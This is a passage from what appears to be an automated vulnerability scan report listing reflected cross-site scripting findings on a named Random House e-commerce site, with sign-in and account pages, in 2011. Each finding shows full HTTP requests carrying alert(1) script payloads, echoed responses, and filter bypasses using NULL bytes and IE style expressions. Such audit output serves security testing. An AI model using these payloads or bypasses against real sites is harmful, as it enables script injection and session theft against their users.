GET /account.do?from=74f99'%3balert(1)//44955d1d1a9 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:20:46 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16995


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
   // extract 'from' param
   var url = window.location.href;
   var paramStart = url.indexOf("?");
   var fromParam = '';
   if( '74f99';alert(1)//44955d1d1a9' == '') {
       if( paramStart != -1) {
           var paramString = url.substr(paramStart + 1);
           var tokenStart = paramString.indexOf('from');
           if( tokenStart != -1) {
               var token = paramString.substr(toke
...[SNIP]...

5.122. https://ecommerce.randomhouse.com/account.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d54"><script>alert(1)</script>e958056cf4c was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account.do?from=randomhouse13d54"><script>alert(1)</script>e958056cf4c HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=BB1FFAF98719ADA63DDF7D45FE159378.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17203


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=randomhouse13d54"><script>alert(1)</script>e958056cf4c">
...[SNIP]...

5.123. https://ecommerce.randomhouse.com/account.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 584a0"%3balert(1)//4a17c54e7d8 was submitted in the from parameter. This input was echoed as 584a0";alert(1)//4a17c54e7d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account.do?from=randomhouse584a0"%3balert(1)//4a17c54e7d8 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=83BECC0B608D70FD1431DA4C08A24D6A.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17083


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="randomhouse584a0";alert(1)//4a17c54e7d8";
//-->
...[SNIP]...

5.124. https://ecommerce.randomhouse.com/create-account-submit.do [confirmPassword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The value of the confirmPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef75"><script>alert(1)</script>4190709400fddb906 was submitted in the confirmPassword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /create-account-submit.do?shippingAddress=useBillingAddress&email=%27%40%27.com&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf&confirmPassword=1234rf7ef75"><script>alert(1)</script>4190709400fddb906&optinemail=Y HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:58:29 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20934


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<input type="password" name="confirmPassword" value="1234rf7ef75"><script>alert(1)</script>4190709400fddb906">
...[SNIP]...

5.125. https://ecommerce.randomhouse.com/create-account-submit.do [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The value of the email request parameter is copied into the HTML document as plain text between tags. The payload 41e31<script>alert(1)</script>df5ae1c2f9536e1ca was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /create-account-submit.do?shippingAddress=useBillingAddress&email=%27%40%27.com41e31<script>alert(1)</script>df5ae1c2f9536e1ca&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf&confirmPassword=1234rf&optinemail=Y HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:52:42 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17138


<!-- account.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
<span class="loggedInText">'@'.com41e31<script>alert(1)</script>df5ae1c2f9536e1ca</span>
...[SNIP]...

5.126. https://ecommerce.randomhouse.com/create-account-submit.do [password parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc3b"><script>alert(1)</script>a734b570e5619ecdd was submitted in the password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /create-account-submit.do?shippingAddress=useBillingAddress&email=%27%40%27.com&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf7dc3b"><script>alert(1)</script>a734b570e5619ecdd&confirmPassword=1234rf&optinemail=Y HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:58:19 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20934


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<input type="password" name="password" value="1234rf7dc3b"><script>alert(1)</script>a734b570e5619ecdd">
...[SNIP]...

5.127. https://ecommerce.randomhouse.com/create-account.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c691"><script>alert(1)</script>070b45f3bf0 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /create-account.do?from=1c691"><script>alert(1)</script>070b45f3bf0 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; RES_SESSIONID=212207240983843; ResonanceSegment=1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:48:07 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20322


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=1c691"><script>alert(1)</script>070b45f3bf0">
...[SNIP]...

5.128. https://ecommerce.randomhouse.com/create-account.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Issue detail

The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %0086d84<script>alert(1)</script>db18887c0e9 was submitted in the from parameter. This input was echoed as 86d84<script>alert(1)</script>db18887c0e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /create-account.do?from=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B06)%3C/script%3E%0086d84<script>alert(1)</script>db18887c0e9 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:48:29 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20496


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</script>.86d84<script>alert(1)</script>db18887c0e9">
...[SNIP]...

5.129. https://ecommerce.randomhouse.com/password.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /password.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 was submitted in the from parameter. This input was echoed as 2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /password.do?from=2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:27 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 11462


<!-- forgottenPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1">
...[SNIP]...

5.130. https://ecommerce.randomhouse.com/password.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /password.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d764b"><script>alert(1)</script>ff6160e5949 was submitted in the from parameter. This input was echoed as d764b"><script>alert(1)</script>ff6160e5949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /password.do?from=%00d764b"><script>alert(1)</script>ff6160e5949 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:32 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 11441


<!-- forgottenPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.d764b"><script>alert(1)</script>ff6160e5949">
...[SNIP]...

5.131. https://ecommerce.randomhouse.com/sign-in-submit.do [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in-submit.do

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8a7"><script>alert(1)</script>e76a6b52e057de0cb was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sign-in-submit.do?email=2d8a7"><script>alert(1)</script>e76a6b52e057de0cb&password= HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/sign-in.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; CP=null*; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.forms.signInForm.submit%252528%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:08 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17136


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<input type="text" name="email" value="2d8a7"><script>alert(1)</script>e76a6b52e057de0cb" size="30" />
...[SNIP]...

5.132. https://ecommerce.randomhouse.com/sign-in-submit.do [password parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in-submit.do

Issue detail

The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d019"><script>alert(1)</script>c69c47f83fc5ae963 was submitted in the password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sign-in-submit.do?email=&password=4d019"><script>alert(1)</script>c69c47f83fc5ae963 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/sign-in.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; CP=null*; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.forms.signInForm.submit%252528%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:41:50 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16987


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<input type="password" name="password" value="4d019"><script>alert(1)</script>c69c47f83fc5ae963" size="30" />
...[SNIP]...

5.133. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 was submitted in the from parameter. This input was echoed as 10afa"style="x:expression(alert(1))"6551a8508b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /sign-in.do?from=%0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:20:59 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 17147


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.10afa"style="x:expression(alert(1))"6551a8508b2">
...[SNIP]...

5.134. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ec7"><script>alert(1)</script>c88b024cdae was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sign-in.do?from=randomhoused3ec7"><script>alert(1)</script>c88b024cdae HTTP/1.1
Host: ecommerce.randomhouse.com
